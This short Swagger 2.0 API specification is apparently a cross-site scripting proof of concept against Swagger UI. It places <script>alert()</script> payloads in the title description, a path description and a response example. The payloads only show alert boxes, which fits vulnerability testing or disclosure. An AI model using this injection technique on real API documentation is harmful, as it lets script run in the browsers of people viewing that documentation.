swagger: "2.0"
info:
  title: "XSS PoC"
  version: "1.0"
  description: "<script>alert('XSS by Rivek')</script>"

paths:
  /:
    get:
      summary: "XSS Test"
      description: "<script>alert('Swagger UI XSS')</script>"
      responses:
        200:
          description: "XSS Exploit"
          schema:
            type: "string"
            example: "<script>alert('Swagger XSS')</script>"
